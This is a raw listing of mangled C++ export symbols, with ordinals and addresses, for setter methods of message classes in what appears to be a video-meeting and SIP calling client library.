              ?SetItem12@?$CmmMessageTemplate_12@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z45650x41a0f0
              ?SetItem12@?$CmmMessageTemplate_12@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_K@Archive@Cmm@@QAEXAB_K@Z45660x419c10
              ?SetItem12@?$CmmMessageTemplate_12@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHHHH@Archive@Cmm@@QAEXABH@Z45670x4262c0
              ?SetItem13@?$CmmMessageTemplate_13@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z45680x41a120
              ?SetItem13@?$CmmMessageTemplate_13@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_KH@Archive@Cmm@@QAEXABH@Z45690x419c40
              ?SetItem14@?$CmmMessageTemplate_14@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z45700x41a150
              ?SetItem14@?$CmmMessageTemplate_14@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_KHI@Archive@Cmm@@QAEXABI@Z45710x419c70
              ?SetItem15@?$CmmMessageTemplate_15@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@V12@V12@V32@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z45720x41a180
              ?SetItem15@?$CmmMessageTemplate_15@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_KHII@Archive@Cmm@@QAEXABI@Z45730x419ca0
              ?SetItem1@?$CmmMessageTemplate_1@H@Archive@Cmm@@QAEXABH@Z45740x40c800
              ?SetItem1@?$CmmMessageTemplate_1@I@Archive@Cmm@@QAEXABI@Z45750x40c800
              ?SetItem1@?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z45760x40d390
              ?SetItem1@?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z45770x40d900
              ?SetItem1@?$CmmMessageTemplate_1@_J@Archive@Cmm@@QAEXAB_J@Z45780x41a8d0
              ?SetItem2@?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAEXABH@Z45790x417bf0
              ?SetItem2@?$CmmMessageTemplate_2@HI@Archive@Cmm@@QAEXABI@Z45800x417bf0
              ?SetItem2@?$CmmMessageTemplate_2@HV?$CStringT@D@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z45810x435ba0
              ?SetItem2@?$CmmMessageTemplate_2@HV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z45820x40d690
              ?SetItem2@?$CmmMessageTemplate_2@H_J@Archive@Cmm@@QAEXAB_J@Z45830x418910
              ?SetItem2@?$CmmMessageTemplate_2@IH@Archive@Cmm@@QAEXABH@Z45840x417bf0
              ?SetItem2@?$CmmMessageTemplate_2@II@Archive@Cmm@@QAEXABI@Z45850x417bf0
              ?SetItem2@?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z45860x435ba0
              ?SetItem2@?$CmmMessageTemplate_2@IV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z45870x40d690
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@H@Archive@Cmm@@QAEXABH@Z45880x417560
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@I@Archive@Cmm@@QAEXABI@Z45890x417560
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z45900x438eb0
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z45910x435630
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@_J@Archive@Cmm@@QAEXAB_J@Z45920x40c8a0
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAEXABH@Z45930x417560
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@I@Archive@Cmm@@QAEXABI@Z45940x417560
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z45950x435630
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V?$CStringT@D@2@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z45960x438eb0
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@_J@Archive@Cmm@@QAEXAB_J@Z45970x40c8a0
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@_K@Archive@Cmm@@QAEXAB_K@Z45980x40c8a0
              ?SetItem2@?$CmmMessageTemplate_2@_JH@Archive@Cmm@@QAEXABH@Z45990x4218a0
              ?SetItem2@?$CmmMessageTemplate_2@_JV?$CStringT@D@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46000x43f6a0
              ?SetItem2@?$CmmMessageTemplate_2@_JV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46010x439850
              ?SetItem3@?$CmmMessageTemplate_3@HHH@Archive@Cmm@@QAEXABH@Z46020x418e60
              ?SetItem3@?$CmmMessageTemplate_3@HHV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46030x438970
              ?SetItem3@?$CmmMessageTemplate_3@HIH@Archive@Cmm@@QAEXABH@Z46040x418e60
              ?SetItem3@?$CmmMessageTemplate_3@HII@Archive@Cmm@@QAEXABI@Z46050x418e60
              ?SetItem3@?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@H@Archive@Cmm@@QAEXABH@Z46060x419a80
              ?SetItem3@?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@I@Archive@Cmm@@QAEXABI@Z46070x419a80
              ?SetItem3@?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46080x435ab0
              ?SetItem3@?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAEXABH@Z46090x419a80
              ?SetItem3@?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@I@Archive@Cmm@@QAEXABI@Z46100x419a80
              ?SetItem3@?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46110x436a90
              ?SetItem3@?$CmmMessageTemplate_3@H_JV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46120x436580
              ?SetItem3@?$CmmMessageTemplate_3@IHI@Archive@Cmm@@QAEXABI@Z46130x418e60
              ?SetItem3@?$CmmMessageTemplate_3@IHV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46140x438970
              ?SetItem3@?$CmmMessageTemplate_3@IIH@Archive@Cmm@@QAEXABH@Z46150x418e60
              ?SetItem3@?$CmmMessageTemplate_3@III@Archive@Cmm@@QAEXABI@Z46160x418e60
              ?SetItem3@?$CmmMessageTemplate_3@IIV?$CStringT@D@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46170x43bfa0
              ?SetItem3@?$CmmMessageTemplate_3@IV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46180x435ab0
              ?SetItem3@?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAEXABH@Z46190x419a80
              ?SetItem3@?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@I@Archive@Cmm@@QAEXABI@Z46200x419a80
              ?SetItem3@?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46210x436a90
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@HH@Archive@Cmm@@QAEXABH@Z46220x419a80
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@HV12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46230x435ab0
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@H_J@Archive@Cmm@@QAEXAB_J@Z46240x4185c0
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IH@Archive@Cmm@@QAEXABH@Z46250x419a80
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@II@Archive@Cmm@@QAEXABI@Z46260x419a80
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IV12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46270x435ab0
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V12@I@Archive@Cmm@@QAEXABI@Z46280x41aef0
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46290x438da0
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46300x435520
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@_JV12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46310x43d980
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HH@Archive@Cmm@@QAEXABH@Z46320x419a80
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HI@Archive@Cmm@@QAEXABI@Z46330x419a80
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HV12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46340x436a90
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HV?$CStringT@D@2@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46350x435ab0
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@IH@Archive@Cmm@@QAEXABH@Z46360x419a80
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@II@Archive@Cmm@@QAEXABI@Z46370x419a80
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@IV12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46380x436a90
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@I_J@Archive@Cmm@@QAEXAB_J@Z46390x4185c0
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@H@Archive@Cmm@@QAEXABH@Z46400x41aef0
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46410x435520
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@_J@Archive@Cmm@@QAEXAB_J@Z46420x424960
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@_JI@Archive@Cmm@@QAEXABI@Z46430x418740
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@_J_J@Archive@Cmm@@QAEXAB_J@Z46440x419350
              ?SetItem3@?$CmmMessageTemplate_3@_JV?$CStringT@D@Cmm@@I@Archive@Cmm@@QAEXABI@Z46450x418740
              ?SetItem3@?$CmmMessageTemplate_3@_JV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46460x43d980
              ?SetItem3@?$CmmMessageTemplate_3@_JV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46470x439760
              ?SetItem4@?$CmmMessageTemplate_4@HHHH@Archive@Cmm@@QAEXABH@Z46480x419080
              ?SetItem4@?$CmmMessageTemplate_4@HHHV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46490x43a720
              ?SetItem4@?$CmmMessageTemplate_4@HIHI@Archive@Cmm@@QAEXABI@Z46500x419080
              ?SetItem4@?$CmmMessageTemplate_4@HV?$CStringT@D@Cmm@@II@Archive@Cmm@@QAEXABI@Z46510x419aa0
              ?SetItem4@?$CmmMessageTemplate_4@HV?$CStringT@D@Cmm@@V12@H@Archive@Cmm@@QAEXABH@Z46520x41af10
              ?SetItem4@?$CmmMessageTemplate_4@HV?$CStringT@D@Cmm@@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46530x43d550
              ?SetItem4@?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@HV12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46540x439140
              ?SetItem4@?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@V12@H@Archive@Cmm@@QAEXABH@Z46550x41af10
              ?SetItem4@?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46560x436980
              ?SetItem4@?$CmmMessageTemplate_4@IHIH@Archive@Cmm@@QAEXABH@Z46570x419080
              ?SetItem4@?$CmmMessageTemplate_4@IHII@Archive@Cmm@@QAEXABI@Z46580x419080
              ?SetItem4@?$CmmMessageTemplate_4@IHV?$CStringT@_W@Cmm@@_J@Archive@Cmm@@QAEXAB_J@Z46590x419fb0
              ?Set_IsIncomingCall@CSBMBMessage_Assistant_SIP_OnCallStatusUpdateNotification@@QAEXABH@Z49900x41d360
              ?Set_IsLogin@CSBMBMessage_RealNameAuthInfo@@QAEXABH@Z49910x40c800
              ?Set_IsMeetingShowExtendDialog@CSBMBMessage_ConfirmConfLeave@@QAEXABH@Z49920x419bc0
              ?Set_IsPrivacyName@CSBMBMessage_NotifyPTCallPeer@@QAEXABH@Z49930x41af10
              ?Set_JMAK@CSBMBMessage_NotifyJoinFailForForceUpdate@@QAEXABV?$CStringT@_W@Cmm@@@Z49940x41a030
              ?Set_JMFLog@CSBMBMessage_ConfirmConfLeave@@QAEXABH@Z49950x419ad0
              ?Set_JoinErrorCode@CSBMBMessage_VDI_Chrome_JoinErrorInfo@@QAEXABI@Z49960x40c800
              ?Set_JoinErrorMessage@CSBMBMessage_VDI_Chrome_JoinErrorInfo@@QAEXABV?$CStringT@D@Cmm@@@Z49970x418370
              ?Set_JoinType@CSBMBMessage_NotifyJoinFailForForceUpdate@@QAEXABV?$CStringT@_W@Cmm@@@Z49980x41a000
              ?Set_JsCallID@CSBMBMessage_CCIVideoCancelInviteByPhoneRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z49990x40c890
              ?Set_JsCallID@CSBMBMessage_CCIVideoGetCurrentUserRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z50000x40c890
              ?Set_JsCallID@CSBMBMessage_CCIVideoGetCurrentUserResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z50010x40c890
              ?Set_JsCallID@CSBMBMessage_CCIVideoGetSupportCountryInfoRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z50020x40c890
              ?Set_JsCallID@CSBMBMessage_CCIVideoGetSupportCountryInfoResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z50030x40c890
              ?Set_JsCallID@CSBMBMessage_CCIVideoGetUserListRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z50040x40c890
              ?Set_JsCallID@CSBMBMessage_CCIVideoGetUserListResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z50050x40c890
              ?Set_JsCallid@CSBMBMessage_CCIVideoJoinMeetingResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z50060x41af80
              ?Set_Json@CSBMBMessage_Assistant_ControlSystem_DevicesPreparedNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z50070x40c890
              ?Set_Json@CSBMBMessage_Assistant_ControlSystem_DevicesUpdatedNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z50080x40c890
              ?Set_Json@CSBMBMessage_Assistant_ControlSystem_ScenesPreparedNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z50090x40c890
              ?Set_JsonMsg@CSBMBMessage_CCIVideoChangeBtnStatusRequest@@QAEXABV?$CStringT@D@Cmm@@@Z50100x40c9b0
              ?Set_JsonValue@CSBMBMessage_UpdateCallSessionSummaryResponse@@QAEXABV?$CStringT@D@Cmm@@@Z50110x40c9b0
              ?Set_Key@CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotification@@QAEXABV?$CStringT@D@Cmm@@@Z50120x40c9b0
              ?Set_Key@CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotificationWithCallID@@QAEXABV?$CStringT@D@Cmm@@@Z50130x41a2d0
              ?Set_Key@CSBMBMessage_LCPRecordOperate@@QAEXABV?$CStringT@_W@Cmm@@@Z50140x40c890
              ?Set_Key@CSBMBMessage_UpdateKeyValueInfo@@QAEXABV?$CStringT@_W@Cmm@@@Z50150x40c890
              ?Set_LastName@CSBMBMessage_UserUpdateName@@QAEXABV?$CStringT@_W@Cmm@@@Z50160x417f10
              ?Set_Leave@CSBMBMessage_ConfirmConfLeave@@QAEXABH@Z50170x419a80
              ?Set_LineCallId@CSBMBMessage_Assistant_SIP_LineCallTerminatedNotification@@QAEXABV?$CStringT@D@Cmm@@@Z50180x40c9b0
              ?Set_LineCallId@CSBMBMessage_UpdateRegisterServer@@QAEXABV?$CStringT@D@Cmm@@@Z50190x40c9b0
              ?Set_LineId@CSBMBMessage_Assistant_SIP_OnRegistrarNotification@@QAEXABV?$CStringT@D@Cmm@@@Z50200x40c9b0
              ?Set_LiveSteamViewUrl@CSBMBMessage_ConfirmConfLeave@@QAEXABV?$CStringT@_W@Cmm@@@Z50210x419b00
              ?Set_LocalIP@CSBMBMessage_CheckNomadic911_Notification@@QAEXABV?$CStringT@D@Cmm@@@Z50220x418370
              ?Set_Log@CSBMBMessage_UploadPbxRealTimeMonitorLog@@QAEXABV?$CStringT@D@Cmm@@@Z50230x40c9b0
              ?Set_MeetingID@CSBMBMessage_InviteBuddyToMeeting@@QAEXABV?$CStringT@_W@Cmm@@@Z50240x417f10
              ?Set_MeetingID@CSBMBMessage_KeepAlive@@QAEXABV?$CStringT@_W@Cmm@@@Z50250x40c890
              ?Set_MeetingID@CSBMBMessage_NotifyCallCommand@@QAEXABV?$CStringT@_W@Cmm@@@Z50260x40c890
              ?Set_MeetingID@CSBMBMessage_NotifyConfPListChanged@@QAEXABV?$CStringT@_W@Cmm@@@Z50270x40c890
              ?Set_MeetingID@CSBMBMessage_NotifyConferenceStatus@@QAEXABV?$CStringT@_W@Cmm@@@Z50280x40c890
              ?Set_MeetingID@CSBMBMessage_NotifyInviteFBBuddy@@QAEXABV?$CStringT@_W@Cmm@@@Z50290x40c890
              ?Set_MeetingID@CSBMBMessage_NotifyStartLogin@@QAEXABV?$CStringT@_W@Cmm@@@Z50300x417f10
              ?Set_MeetingID@CSBMBMessage_NotifyUpdateDisclaimerStatus@@QAEXABV?$CStringT@_W@Cmm@@@Z50310x417f20
              ?Set_MeetingID@CSBMBMessage_OpenInviteRoomSystemCalloutTab@@QAEXABV?$CStringT@_W@Cmm@@@Z50320x40c890
              ?Set_MeetingNo@CSBMBMessage_NotifyJoinFailForForceUpdate@@QAEXAB_J@Z50330x41a8d0
              ?Set_MeetingNo@CSBMBMessage_NotifySaveChat@@QAEXAB_J@Z50340x41a8d0
              ?Set_MeetingNo@CSBMBMessage_NotifyStartRecording@@QAEXAB_J@Z50350x41a8d0
              ?Set_MeetingNum@CSBMBMessage_Assistant_SIP_JoinMeetingRequest@@QAEXAB_J@Z50360x40c8a0
              ?Set_MeetingNum@CSBMBMessage_Assistant_SIP_UpgradeToMeetingRequest@@QAEXAB_J@Z50370x40c8a0
              ?Set_MeetingNum@CSBMBMessage_InviteBuddyToMeeting@@QAEXAB_J@Z50380x424960
              ?Set_MeetingNumber@CSBMBMessage_NotifyConferenceStatus@@QAEXAB_J@Z50390x40c8a0
              ?Set_MeetingNumber@CSBMBMessage_NotifyInviteFBBuddy@@QAEXAB_J@Z50400x4185c0
              ?Set_MeetingNumber@CSBMBMessage_NotifyUpdateDisclaimerStatus@@QAEXABV?$CStringT@_W@Cmm@@@Z50410x417f10
              ?Set_MeetingNumber@CSBMBMessage_OpenInviteRoomSystemCalloutTab@@QAEXAB_J@Z50420x40c8a0
              ?Set_MeetingTopic@CSBMBMessage_NotifySaveChat@@QAEXABV?$CStringT@_W@Cmm@@@Z50430x41a8f0
              ?Set_MeetingTopic@CSBMBMessage_NotifyStartRecording@@QAEXABV?$CStringT@_W@Cmm@@@Z50440x41a8f0
              ?Set_MeetingTypes@CSBMBMessage_Assistant_SIP_JoinMeetingRequest@@QAEXABH@Z50450x41d910
              ?Set_MemberName@CSBMBMessage_Assistant_SIP_RemoteMergerEvent@@QAEXABV?$CStringT@D@Cmm@@@Z50460x418380
              ?Set_MemberNumber@CSBMBMessage_Assistant_SIP_RemoteMergerEvent@@QAEXABV?$CStringT@D@Cmm@@@Z50470x41d330
              ?Set_MethodID@CSBMBMessage_Assistant_ControlSystem_DoOperationRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z50480x418b80
              ?Set_MinClientVersion@CSBMBMessage_NotifyJoinFailForForceUpdate@@QAEXABV?$CStringT@_W@Cmm@@@Z50490x41a910
              ?Set_MsgID@CSBMBMessage_UploadFeedback@@QAEXABH@Z50500x40c800
              ?Set_MsgType@CSBMBMessage_NotifyMeetingCallResponse@@QAEXABI@Z50510x40c800
              ?Set_MyScreenName@CSBMBMessage_NotifyUpdateDisclaimerStatus@@QAEXABV?$CStringT@_W@Cmm@@@Z50520x40c890
              ?Set_Name@CSBMBMessage_Assistant_ControlSystem_ExecuteRuleRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z50530x40c890
              ?Set_Name@CSBMBMessage_CCIVideoInviteByPhoneRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z50540x417f20
              ?Set_Name@CSBMBMessage_NotifyPTCallPeer@@QAEXABV?$CStringT@_W@Cmm@@@Z50550x417f10
              ?Set_Name@CSBMBMessage_UpdateFeatureToggle@@QAEXABV?$CStringT@D@Cmm@@@Z50560x40c9b0
              ?Set_NameSpace@CSBMBMessage_IPCSDK_SDKCmdNotify@@QAEXABV?$CStringT@D@Cmm@@@Z50570x40c9b0
              ?Set_NameSpace@CSBMBMessage_IPCSDK_SDKCmdRequest@@QAEXABV?$CStringT@D@Cmm@@@Z50580x40c9b0
              ?Set_NeedUserConfirm@CSBMBMessage_OperateAudioFacilityParam@@QAEXABH@Z50590x419080
              ?Set_NeedUserConfirm@CSBMBMessage_OperateChatFacilityParam@@QAEXABH@Z50600x418e60
              ?Set_NeedUserConfirm@CSBMBMessage_OperateScreenShareFacilityParam@@QAEXABH@Z50610x418e60
              ?Set_NeedUserConfirm@CSBMBMessage_OperateVideoFacilityParam@@QAEXABH@Z50620x418e60
              ?Set_NetworkState@CSBMBMessage_NotifyNetworkSwitch@@QAEXABI@Z50630x40c800
              ?Set_NewCount@CSBMBMessage_Assistant_SIP_MessageCountChanged@@QAEXABI@Z50640x417bf0
              ?Set_NewHostCallid@CSBMBMessage_Assistant_SIP_MergeCallHostChanged@@QAEXABV?$CStringT@D@Cmm@@@Z50650x418380
              ?Set_NotifyType@CSBMBMessage_OutlookMAPIEventChangeNotify@@QAEXABI@Z50660x40c800
              ?Set_OldCount@CSBMBMessage_Assistant_SIP_MessageCountChanged@@QAEXABI@Z50670x40c800
              ?Set_OldHostCallid@CSBMBMessage_Assistant_SIP_MergeCallHostChanged@@QAEXABV?$CStringT@D@Cmm@@@Z50680x418370
              ?Set_OperateType@CSBMBMessage_OperateAudioFacilityParam@@QAEXABH@Z50690x418e60
              ?Set_OperateType@CSBMBMessage_OperateChatFacilityParam@@QAEXABH@Z50700x417bf0
              ?Set_OperateType@CSBMBMessage_OperateScreenShareFacilityParam@@QAEXABH@Z50710x417bf0
              ?Set_OperateType@CSBMBMessage_OperateVideoFacilityParam@@QAEXABH@Z50720x417bf0
              ?Set_OperationType@CSBMBMessage_LCPRecordOperate@@QAEXABH@Z50730x418d00
              ?Set_Options@CSBMBMessage_UploadFeedback@@QAEXAB_J@Z50740x418910
              ?Set_P1@CSBMBMessage_AddClientLog@@QAEXABV?$CStringT@_W@Cmm@@@Z50750x40c810
              ?Set_P2@CSBMBMessage_AddClientLog@@QAEXABV?$CStringT@_W@Cmm@@@Z50760x418b80
              ?Set_P3@CSBMBMessage_AddClientLog@@QAEXABV?$CStringT@_W@Cmm@@@Z50770x418b90
              ?Set_P4@CSBMBMessage_AddClientLog@@QAEXABV?$CStringT@_W@Cmm@@@Z50780x418bb0
              ?Set_P5@CSBMBMessage_AddClientLog@@QAEXABV?$CStringT@_W@Cmm@@@Z50790x419880
              ?Set_PTNotified@CSBMBMessage_CCIVideoEndVideoNotify@@QAEXABH@Z50800x418e60
              ?Set_PageImgPath@CSBMBMessage_Doc2ImgConvertProgress@@QAEXABV?$CStringT@_W@Cmm@@@Z50810x41b460
              ?Set_PageIndexFinished@CSBMBMessage_Doc2ImgConvertProgress@@QAEXABI@Z50820x419aa0
              ?Set_PageNumSuccess@CSBMBMessage_Doc2ImgConvertFinish@@QAEXABI@Z50830x419a80
              ?Set_PageNumTotal@CSBMBMessage_Doc2ImgConvertProgress@@QAEXABI@Z50840x419a80
              ?Set_PageNumTotal@CSBMBMessage_Doc2ImgStartConvertResponse@@QAEXABI@Z50850x419a80
              ?Set_Param@CSBMBMessage_HeartBeatRequest@@QAEXABI@Z50860x40c800
              ?Set_Param@CSBMBMessage_NotifyAppEvent@@QAEXABV?$CStringT@_W@Cmm@@@Z50870x40c810
              ?Set_Param@CSBMBMessage_NotifyDeviceReady@@QAEXABV?$CStringT@_W@Cmm@@@Z50880x40c890
              ?Set_Param@CSBMBMessage_NotifyEndSetting@@QAEXABI@Z50890x40c800
              ?Set_Param@CSBMBMessage_NotifyJoinByMeetingNumber@@QAEXABI@Z50900x40c800
              ?Set_Param@CSBMBMessage_NotifyOpenDialPad@@QAEXABI@Z50910x40c800
              ?Set_Param@CSBMBMessage_NotifyStartSetting@@QAEXABI@Z50920x40c800
              ?Set_ParamID@CSBMBMessage_Assistant_ControlSystem_DoOperationRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z50930x418b90
              ?Set_Parameter@CSBMBMessage_NotifyUpgradeAccount@@QAEXABV?$CStringT@_W@Cmm@@@Z50940x40c890
              ?Set_Password@CSBMBMessage_NotifyJoinFailForForceUpdate@@QAEXABV?$CStringT@_W@Cmm@@@Z50950x41a8f0
              ?Set_Password@CSBMBMessage_NotifyStartLogin@@QAEXABV?$CStringT@_W@Cmm@@@Z50960x417f20
              ?Set_Password@CSBMBMessage_NotifyUserInputProxyAuth@@QAEXABV?$CStringT@_W@Cmm@@@Z50970x41a720
              ?Set_Path@CSBMBMessage_NotifySaveChat@@QAEXABV?$CStringT@_W@Cmm@@@Z50980x41a900
              ?Set_Path@CSBMBMessage_NotifyStartRecording@@QAEXABV?$CStringT@_W@Cmm@@@Z50990x41a900
              ?Set_PeerDisplayName@CSBMBMessage_Assistant_SIP_OnCallStatusUpdateNotification@@QAEXABV?$CStringT@D@Cmm@@@Z51000x41d340
              ?Set_PeerNumber@CSBMBMessage_Assistant_SIP_OnCallStatusUpdateNotification@@QAEXABV?$CStringT@D@Cmm@@@Z51010x41d330
              ?Set_PeerURI@CSBMBMessage_Assistant_SIP_OnCallStatusUpdateNotification@@QAEXABV?$CStringT@D@Cmm@@@Z51020x418380
              ?Set_Permanent@CSBMBMessage_VTLSConfirm@@QAEXABH@Z51030x41be80
              ?Set_PhoneNumber@CSBMBMessage_CCIVideoInviteByPhoneRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z51040x417f10
              ?Set_PhoneNumber@CSBMBMessage_NotifyPTCallPeer@@QAEXABV?$CStringT@_W@Cmm@@@Z51050x40c890
              ?Set_PhoneNumber@CSBMBMessage_Outlook_IMIntegration_StartAudio_Request@@QAEXABV?$CStringT@D@Cmm@@@Z51060x41a2d0
              ?Set_PhotoPath@CSBMBMessage_Outlook_IMIntegration_GetContactInfo_Response@@QAEXABV?$CStringT@D@Cmm@@@Z51070x41d330
              ?Set_PhotoPath@CSBMBMessage_Outlook_IMIntegration_PhotoChanged_Notification@@QAEXABV?$CStringT@D@Cmm@@@Z51080x41a2d0
              ?Set_PicPath@CSBMBMessage_UserUploadPicture@@QAEXABV?$CStringT@_W@Cmm@@@Z51090x40c890
              ?Set_PmiName@CSBMBMessage_Assistant_SIP_JoinMeetingRequest@@QAEXABV?$CStringT@D@Cmm@@@Z51100x41d7e0
              ?Set_Policies@CSBMBMessage_Assistant_SIP_ReceiveRealtimePolicesNotification@@QAEXAB_J@Z51110x40c8a0
              ?Set_Port@CSBMBMessage_NotifyUserInputProxyAuth@@QAEXABI@Z51120x419a80
              ?Set_Port@CSBMBMessage_PromptProxyAuth@@QAEXABI@Z51130x419a80
